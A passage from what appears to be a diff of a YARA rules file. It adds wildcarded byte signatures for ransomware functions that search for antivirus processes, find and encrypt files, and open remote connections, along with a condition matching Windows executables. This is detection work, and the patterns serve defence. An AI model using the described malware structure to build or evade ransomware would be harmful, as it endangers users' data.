?? ?? 88 07 FF D6 FF 75 ?? 03 C0 89 47 ?? FF + D6 8D 04 45 ?? ?? ?? ?? 50 FF 75 ?? 8D 47 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? FF 75 + ?? FF D6 8D 04 45 ?? ?? ?? ?? 50 57 8D 45 ?? 50 53 FF 15 ?? ?? ?? ?? 8B 4D ?? 89 01 + 8B CF E8 ?? ?? ?? ?? 8B 7D ?? 8B 45 ?? FF 70 ?? FF 70 ?? 6A ?? 6A ?? 53 FF 15 ?? ?? + ?? ?? 53 FF 15 ?? ?? ?? ?? 8B C7 5F 5E 5B 8B E5 5D C3 + } + $find_files_v5_0_1 = { + 55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 53 56 57 33 FF 89 54 24 ?? 8B F1 89 7C 24 ?? 39 + 7D ?? 75 ?? 8D 54 24 ?? E8 ?? ?? ?? ?? 8B 5C 24 ?? 85 C0 75 ?? 85 DB 75 ?? 33 C0 E9 + ?? ?? ?? ?? 33 DB 43 8B CE E8 ?? ?? ?? ?? 85 C0 75 ?? 66 83 3E ?? 74 ?? 8D 54 24 ?? + 89 7C 24 ?? 8B CE E8 ?? ?? ?? ?? 89 44 24 ?? 39 7C 24 ?? 75 ?? 56 FF 15 ?? ?? ?? ?? + 68 ?? ?? ?? ?? 56 8D 04 46 89 44 24 ?? FF 15 ?? ?? ?? ?? 6A ?? 57 57 8D 44 24 ?? 50 + 6A ?? 56 FF 15 ?? ?? ?? ?? 8B 4C 24 ?? 33 D2 89 44 24 ?? 66 89 11 83 F8 ?? 75 ?? BF + ?? ?? ?? ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 + ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8D 44 24 ?? 50 56 FF + 15 ?? ?? ?? ?? F6 44 24 ?? ?? 74 ?? 85 DB 74 ?? BA ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? + 85 C0 74 ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 6A ?? 8B 54 24 ?? 8B CE E8 ?? ?? ?? + ?? EB ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 57 EB ?? FF 74 24 ?? 8D 54 24 ?? 8B CE + E8 ?? ?? ?? ?? 59 8B 44 24 ?? 33 C9 66 89 08 8D 44 24 ?? 50 FF 74 24 ?? FF 15 ?? ?? + ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? + ?? ?? 8B C7 5F 5E 5B 8B E5 5D C3 + } + $search_antivirus_processes_v5_0_1 = { + 55 8B EC 83 EC ?? 53 56 8B 35 ?? ?? ?? ?? BB ?? ?? ?? ?? 57 6A ?? 53 68 ?? ?? ?? ?? + 33 C0 50 FF D6 8B 7D ?? 6A ?? 53 6A ?? 33 DB 89 07 53 C7 45 ?? ?? ?? ?? ?? C7 45 ?? + ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? + ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? + ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? + ?? ?? ?? ?? FF D6 8B F0 85 F6 75 ?? 33 C0 E9 ?? ?? ?? ?? 53 6A ?? C7 06 ?? ?? ?? ?? + FF 15 ?? ?? ?? ?? 89 45 ?? 83 F8 ?? 75 ?? 68 ?? ?? ?? ?? 53 56 FF 15 ?? ?? ?? ?? EB + ?? 56 33 C9 89 5D ?? 50 89 5D ?? 89 4D ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? + 83 7D ?? ?? 0F 85 ?? ?? ?? ?? 33 C0 8D 4E ?? 89 45 ?? 51 FF 74 85 ?? FF 15 ?? ?? ?? + ?? 85 C0 74 ?? 8B 45 ?? 8D 4E ?? 40 89 45 ?? 83 F8 ?? 72 ?? EB ?? 33 C0 39 45 ?? 8D + 58 ?? 8D 46 ?? 50 FF 37 75 ?? FF 15 ?? ?? ?? ?? EB ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? + ?? FF 37 FF 15 ?? ?? ?? ?? FF 45 ?? 8D 46 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 6A ?? 8D + 0C 41 8B 45 ?? 81 F9 ?? ?? ?? ?? 89 4D ?? 59 0F 47 C1 89 45 ?? 56 FF 75 ?? FF 15 ?? + ?? ?? ?? 85 C0 74 ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 85 DB 74 ?? 8B 07 + 33 C9 66 39 08 74 ?? 50 FF 15 ?? ?? ?? ?? 8B 0F 33 D2 66 89 54 41 ?? 8B 45 ?? 8B 4D + ?? 89 08 68 ?? ?? ?? ?? 33 C0 50 56 8B 35 ?? ?? ?? ?? FF D6 FF 75 ?? FF 15 ?? ?? ?? + ?? 85 DB 75 ?? 68 ?? ?? ?? ?? 33 C0 50 FF 37 FF D6 8B C3 5F 5E 5B 8B E5 5D C2 + } + $set_url_parameters_v5_0_2 = { + 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? + 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? + 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 + ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 + ?? 8B 45 ?? 8D 8C 00 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? + 75 ?? 6A ?? FF 15 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 + ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF + 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF + 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 68 ?? ?? ?? ?? FF 35 + ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 + ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? + D1 E0 A3 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? D1 E0 8B D0 8B 0D ?? ?? ?? + ?? E8 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A + ?? FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 ?? 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 68 + ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 + ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? + ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 3D ?? ?? ?? + ?? 73 ?? 83 65 ?? ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 74 ?? 6A + ?? FF 75 ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 75 ?? FF 15 ?? ?? + ?? ?? 83 7D ?? ?? 74 ?? 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? + ?? ?? 8B E5 5D C3 + } + $set_url_parameters_v5_0_3 = { + 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? + 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? + 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 + ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 + ?? 8B 45 ?? 8D 8C 00 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? + 75 ?? 6A ?? FF 15 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 + ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF + 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF + 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 68 ?? ?? ?? ?? FF 35 + ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 + ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? + D1 E0 A3 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? D1 E0 8B D0 8B 0D ?? ?? ?? + ?? E8 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? + ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? + ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? + ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 3D ?? ?? ?? ?? 73 ?? 83 65 ?? ?? 68 ?? ?? ?? ?? 8D + 45 ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 74 ?? 6A ?? FF 75 ?? 6A ?? 6A ?? FF 15 ?? ?? ?? + ?? 68 ?? ?? ?? ?? 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? + 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 ?? 6A ?? FF 75 ?? FF 15 ?? ?? + ?? ?? 83 7D ?? ?? 74 ?? 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? + ?? ?? 8B E5 5D C3 + } + $search_antivirus_processes_v5_0_2 = { + 55 8B EC 83 EC ?? 53 56 8B 35 ?? ?? ?? ?? BB ?? ?? ?? ?? 57 6A ?? 53 68 ?? ?? ?? ?? + 33 C0 50 FF D6 8B 7D ?? 6A ?? 53 6A ?? 33 DB 89 07 53 C7 45 ?? ?? ?? ?? ?? C7 45 ?? + ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? + ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? + ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? + ?? ?? ?? ?? FF D6 8B F0 85 F6 75 ?? 33 C0 E9 ?? ?? ?? ?? 53 6A ?? C7 06 ?? ?? ?? ?? + FF 15 ?? ?? ?? ?? 89 45 ?? 83 F8 ?? 75 ?? 68 ?? ?? ?? ?? 53 56 FF 15 ?? ?? ?? ?? EB + ?? 56 33 C9 89 5D ?? 50 89 5D ?? 89 4D ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? + 83 7D ?? ?? 0F 85 ?? ?? ?? ?? 33 C0 8D 4E ?? 89 45 ?? 51 FF 74 85 ?? FF 15 ?? ?? ?? + ?? 85 C0 74 ?? 8B 45 ?? 8D 4E ?? 40 89 45 ?? 83 F8 ?? 72 ?? EB ?? 33 C0 39 45 ?? 8D + 58 ?? 8D 46 ?? 50 FF 37 75 ?? FF 15 ?? ?? ?? ?? EB ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? + ?? FF 37 FF 15 ?? ?? ?? ?? FF 45 ?? 8D 46 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 6A ?? 8D + 0C 41 8B 45 ?? 81 F9 ?? ?? ?? ?? 89 4D ?? 59 0F 47 C1 89 45 ?? 56 FF 75 ?? FF 15 ?? + ?? ?? ?? 85 C0 74 ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 85 DB 74 ?? 8B 07 + 33 C9 66 39 08 74 ?? 50 FF 15 ?? ?? ?? ?? 8B 0F 33 D2 66 89 54 41 ?? 8B 45 ?? 8B 4D + ?? 89 08 68 ?? ?? ?? ?? 33 C0 50 56 8B 35 ?? ?? ?? ?? FF D6 FF 75 ?? FF 15 ?? ?? ?? + ?? 85 DB 75 ?? 68 ?? ?? ?? ?? 33 C0 50 FF 37 FF D6 8B C3 5F 5E 5B 8B E5 5D C2 + } + $find_files_v5_0_2 = { + 55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 53 56 57 33 FF 89 54 24 ?? 8B F1 89 7C 24 ?? 39 + 7D ?? 75 ?? 8D 54 24 ?? E8 ?? ?? ?? ?? 8B 5C 24 ?? 85 C0 75 ?? 85 DB 75 ?? 33 C0 E9 + ?? ?? ?? ?? 33 DB 43 8B CE E8 ?? ?? ?? ?? 85 C0 75 ?? 66 83 3E ?? 74 ?? 8D 54 24 ?? + 89 7C 24 ?? 8B CE E8 ?? ?? ?? ?? 89 44 24 ?? 39 7C 24 ?? 75 ?? 56 FF 15 ?? ?? ?? ?? + 68 ?? ?? ?? ?? 56 8D 04 46 89 44 24 ?? FF 15 ?? ?? ?? ?? 6A ?? 57 57 8D 44 24 ?? 50 + 6A ?? 56 FF 15 ?? ?? ?? ?? 89 44 24 ?? 83 F8 ?? 75 ?? 8D 44 24 ?? 50 56 FF 15 ?? ?? + ?? ?? 89 44 24 ?? 8B 4C 24 ?? 33 D2 66 89 11 83 F8 ?? 75 ?? BF ?? ?? ?? ?? E9 ?? ?? + ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 8D + 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8D 44 24 ?? 50 56 FF 15 ?? ?? ?? ?? F6 44 + 24 ?? ?? 74 ?? 85 DB 74 ?? BA ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ?? + ?? ?? 56 FF 15 ?? ?? ?? ?? 6A ?? 8B 54 24 ?? 8B CE E8 ?? ?? ?? ?? EB ?? 68 ?? ?? ?? + ?? 56 FF 15 ?? ?? ?? ?? 57 EB ?? FF 74 24 ?? 8D 54 24 ?? 8B CE E8 ?? ?? ?? ?? 59 8B + 44 24 ?? 33 C9 66 89 08 8D 44 24 ?? 50 FF 74 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? + ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 8B C7 5F 5E 5B + 8B E5 5D C3 + } + $crypt_files_v5_0_2 = { + 55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 8B D9 89 55 ?? 33 FF 89 5D ?? 21 7D ?? B9 ?? ?? + ?? ?? 89 7D ?? E8 ?? ?? ?? ?? 8B F0 33 C0 89 75 ?? 85 F6 0F 84 ?? ?? ?? ?? 50 68 ?? + ?? ?? ?? 6A ?? 50 50 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B D8 83 FB ?? 75 ?? 33 C0 + 50 68 ?? ?? ?? ?? 6A ?? 50 50 68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8B D8 83 FB + ?? 0F 84 ?? ?? ?? ?? 8B 7D ?? FF 77 ?? FF 77 ?? 6A ?? 6A ?? 53 FF 15 ?? ?? ?? ?? 6A + ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? 8D 45 ?? 50 68 + ?? ?? ?? ?? 56 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 81 BE ?? ?? ?? ?? ?? ?? ?? ?? 75 ?? + 81 BE ?? ?? ?? ?? ?? ?? ?? ?? 75 ?? FF 77 ?? FF 77 ?? 6A ?? 6A ?? 53 FF 15 ?? ?? ?? + ?? 53 FF 15 ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 33 C0 E9 ?? ?? ?? ?? 6A ?? 6A ?? 0F 57 + C0 66 0F 13 45 ?? FF 75 ?? FF 75 ?? 53 FF 15 ?? ?? ?? ?? FF 75 ?? 83 65 ?? ?? 8D 55 + ?? 56 8D 4D ?? E8 ?? ?? ?? ?? 59 59 85 C0 74 ?? 6A ?? 58 C6 45 ?? ?? 48 75 ?? 51 68 + ?? ?? ?? ?? 8D 55 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? 8B 8E ?? ?? + ?? ?? 83 65 ?? ?? 83 65 ?? ?? 41 89 45 ?? 8B 45 ?? 89 45 ?? E8 ?? ?? ?? ?? 8B 8E ?? + ?? ?? ?? 83 C1 ?? 89 45 ?? E8 ?? ?? ?? ?? 89 45 ?? 33 FF 6A ?? 8D 45 ?? 50 FF B6 ?? + ?? ?? ?? FF 75 ?? 53 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 85 C0 0F 84 + ?? ?? ?? ?? 3B 86 ?? ?? ?? ?? 8B 55 ?? 6A ?? 59 0F 42 F9 83 7D ?? ?? 8D 8D ?? ?? ?? + ?? 0F 45 7D ?? 01 86 ?? ?? ?? ?? 89 7D ?? 83 96 ?? ?? ?? ?? ?? 8B 45 ?? 50 FF 75 ?? + 89 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 59 59 33 C9 F7 D8 41 99 51 6A ?? 52 50 53 FF 15 ?? + ?? ?? ?? 6A ?? 8D 45 ?? 50 FF 75 ?? FF 75 ?? 53 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 75 + ?? 8B 7D ?? 6A ?? FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 57 56 53 FF 15 ?? ?? ?? ?? 85 + C0 74 ?? 8B 75 ?? 8B 7D ?? 33 C0 40 01 86 ?? ?? ?? ?? 83 96 ?? ?? ?? ?? ?? EB ?? 33 + C0 8D 78 ?? 85 FF 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 6A ?? 6A ?? 0F 57 C0 66 0F 13 + 45 ?? FF 75 ?? FF 75 ?? 53 FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 56 53 + FF 15 ?? ?? ?? ?? 8B 4D ?? 8B F8 89 7D ?? E8 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 8B + CE E8 ?? ?? ?? ?? 85 DB 0F 84 ?? ?? ?? ?? 85 FF 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? + FF 75 ?? 83 65 ?? ?? 83 65 ?? ?? 8B 35 ?? ?? ?? ?? FF D6 8D 0C 45 ?? ?? ?? ?? E8 ?? + ?? ?? ?? FF 75 ?? 8B F8 33 C0 40 83 67 ?? ?? 88 07 FF D6 FF 75 ?? 03 C0 89 47 ?? FF + D6 8D 04 45 ?? ?? ?? ?? 50 FF 75 ?? 8D 47 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? FF 75 + ?? FF D6 8D 04 45 ?? ?? ?? ?? 50 57 8D 45 ?? 50 53 FF 15 ?? ?? ?? ?? 8B 4D ?? 89 01 + 8B CF E8 ?? ?? ?? ?? 8B 7D ?? 8B 45 ?? FF 70 ?? FF 70 ?? 6A ?? 6A ?? 53 FF 15 ?? ?? + ?? ?? 53 FF 15 ?? ?? ?? ?? 8B C7 5F 5E 5B 8B E5 5D C3 + } + $remote_connection_v5_0_2 = { + 55 8B EC 83 EC ?? 53 8B 1D ?? ?? ?? ?? 56 8B F1 57 83 7E ?? ?? 74 ?? FF 76 ?? FF D3 + 8B CE E8 ?? ?? ?? ?? 33 FF 57 57 6A ?? 57 57 FF 75 ?? FF 75 ?? FF 76 ?? FF 15 ?? ?? + ?? ?? 89 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 68 ?? + ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 75 ?? 8B F0 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? + 83 C4 ?? B8 ?? ?? ?? ?? 81 7D ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? 0F 44 C8 57 51 57 57 68 + ?? ?? ?? ?? 56 8B 75 ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 89 45 ?? 85 C0 74 ?? FF + 75 ?? FF 75 ?? FF 75 ?? FF 75 ?? 50 FF 15 ?? ?? ?? ?? 33 C9 41 85 C0 8B 45 ?? 0F 45 + F9 50 FF D3 56 FF D3 8D 4D ?? E8 ?? ?? ?? ?? 8B C7 5F 5E 5B 8B E5 5D C2 + } + $crypt_files_v5_0_3 = { + 55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 8B F9 89 55 ?? 33 DB B9 ?? ?? ?? ?? 89 5D ?? E8 + ?? ?? ?? ?? 8B F0 89 75 ?? 85 F6 75 ?? 33 C0 E9 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? 6A ?? + 53 53 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 8B F8 83 FF ?? 0F 84 ?? ?? ?? ?? 6A ?? 53 + 6A ?? 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 53 8D 45 ?? 50 68 ?? ?? ?? ?? + 56 57 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 81 BE ?? ?? ?? ?? ?? ?? ?? ?? 75 ?? 81 BE ?? ?? + ?? ?? ?? ?? ?? ?? 75 ?? 8B 45 ?? FF 70 ?? FF 70 ?? 53 53 57 FF 15 ?? ?? ?? ?? 57 FF + 15 ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 53 53 0F 57 C0 66 0F 13 45 ?? FF + 75 ?? FF 75 ?? 57 FF 15 ?? ?? ?? ?? FF 75 ?? 8D 55 ?? 89 5D ?? 56 8D 4D ?? E8 ?? ?? + ?? ?? 59 59 85 C0 74 ?? 6A ?? 58 88 5D ?? 48 75 ?? 51 68 ?? ?? ?? ?? 8D 55 ?? 8D 8D + ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? 8B 8E ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 41 + 8B 45 ?? 89 85 ?? ?? ?? ?? 89 5D ?? 89 5D ?? E8 ?? ?? ?? ?? 8B 8E ?? ?? ?? ?? 83 C1 + ?? 89 45 ?? E8 ?? ?? ?? ?? 89 45 ?? 89 5D ?? 53 8D 45 ?? 50 FF B6 ?? ?? ?? ?? FF 75 + ?? 57 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 4D ?? 85 C9 0F 84 ?? ?? ?? ?? 3B + 8E ?? ?? ?? ?? 8B 45 ?? 6A ?? 5A 0F 42 C2 39 5D ?? 8B 55 ?? 0F 45 45 ?? 01 8E ?? ?? + ?? ?? 8D 8D ?? ?? ?? ?? 89 45 ?? 11 9E ?? ?? ?? ?? 8B 45 ?? 8B 75 ?? 50 56 89 45 ?? + E8 ?? ?? ?? ?? 8B 45 ?? 59 59 33 C9 F7 D8 41 99 51 53 52 50 57 FF 15 ?? ?? ?? ?? 8B + C3 89 5D ?? 83 F8 ?? 7D ?? 53 8D 45 ?? 50 FF 75 ?? 56 57 FF 15 ?? ?? ?? ?? 85 C0 75 + ?? 6A ?? FF 15 ?? ?? ?? ?? 8B 45 ?? 40 89 45 ?? EB ?? 8B 75 ?? 33 C0 8B 4D ?? 40 01 + 86 ?? ?? ?? ?? 11 9E ?? ?? ?? ?? EB ?? 33 C0 8D 48 ?? 89 4D ?? 85 C9 0F 84 ?? ?? ?? + ?? 39 5D ?? 74 ?? 6A ?? 53 0F 57 C0 66 0F 13 45 ?? FF 75 ?? FF 75 ?? 57 FF 15 ?? ?? + ?? ?? 53 8D 45 ?? 50 68 ?? ?? ?? ?? 56 57 FF 15 ?? ?? ?? ?? 8B 4D ?? 8B D8 E8 ?? ?? + ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 83 FF ?? 74 ?? 8B 45 ?? 57 83 08 + ?? FF 15 ?? ?? ?? ?? 8B C3 5F 5E 5B 8B E5 5D C3 + } + $remote_connection_v5_0_3 = { + 55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 68 ?? ?? ?? ?? 33 DB 8D 85 ?? ?? ?? ?? 8B F1 53 + 50 89 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B FB 0F B7 04 5E 66 85 C0 74 ?? 83 F8 ?? 75 ?? + 83 C3 ?? 56 89 5D ?? FF 15 ?? ?? ?? ?? 3B D8 73 ?? 8D 14 1B 0F B7 04 32 EB ?? 66 83 + F8 ?? 74 ?? 43 0F B7 04 5E 66 85 C0 75 ?? EB ?? 8B CB 2B 4D ?? 74 ?? 03 F2 8D BD ?? + ?? ?? ?? D1 E9 F3 A5 13 C9 66 F3 A5 8B 75 ?? 8D 43 ?? 8D 04 46 50 8D 85 ?? ?? ?? ?? + 50 FF 15 ?? ?? ?? ?? 33 FF 47 43 85 FF 74 ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B 15 ?? ?? ?? + ?? 8D 7D ?? 6A ?? 59 BE ?? ?? ?? ?? F3 A5 8B 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 85 + FF 74 ?? 51 8D 45 ?? 50 FF 15 ?? ?? ?? ?? 50 8D 45 ?? 50 83 EC ?? 57 FF 15 ?? ?? ?? + ?? 50 57 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8B CF 8B + F0 E8 ?? ?? ?? ?? EB ?? 33 F6 83 7D ?? ?? 74 ?? FF 75 ?? FF 15 ?? ?? ?? ?? 5F 8B C6 + 5E 5B 8B E5 5D C3 + } -rule REVERSINGLABS_Cert_Blocklist_B514E4C5309Ef9F27Add05Bedd4339A0 : INFO FILE + condition: + uint16(0)==0x5A4D and (($search_antivirus_processes and $find_files and $crypt_files and $remote_connection) or ($find_files_v2 and $crypt_files_v2 and $search_antivirus_processes_v2 and $remote_connection_v2) or ($search_antivirus_processes_v2 and $find_files_v2_1 and $crypt_files_v2_1 and $remote_connection_v2_1) or ($search_antivirus_processes_v4_1_2 and $find_files_v4_1_2 and $crypt_files_v4_1_2 and $remote_connection_v4_1_2 and $url_parameters_setup_v4_1_2) or ($search_antivirus_processes_v4 and $find_files_v4 and $crypt_files_v4 and $url_parameters_setup_v4) or ($search_antivirus_processes_v2 and $find_files_v2_1 and $remote_connection_v2_1 and $crypt_files_v3) or ($search_antivirus_processes_v5 and $find_files_v5 and $crypt_files_v5 and $remote_connection_v5 and $url_parameters_setup_v5) or ($search_antivirus_processes_v5_0_1 and $find_files_v5_0_1 and $crypt_files_v5_0_1 and $url_parameters_setup_v5_0_1 and $remote_connection_v5_0_1) or ($search_antivirus_processes_v5_0_2 and $find_files_v5_0_2 and $crypt_files_v5_0_2 and $set_url_parameters_v5_0_2 and $remote_connection_v5_0_2) or ($search_antivirus_processes_v5_0_2 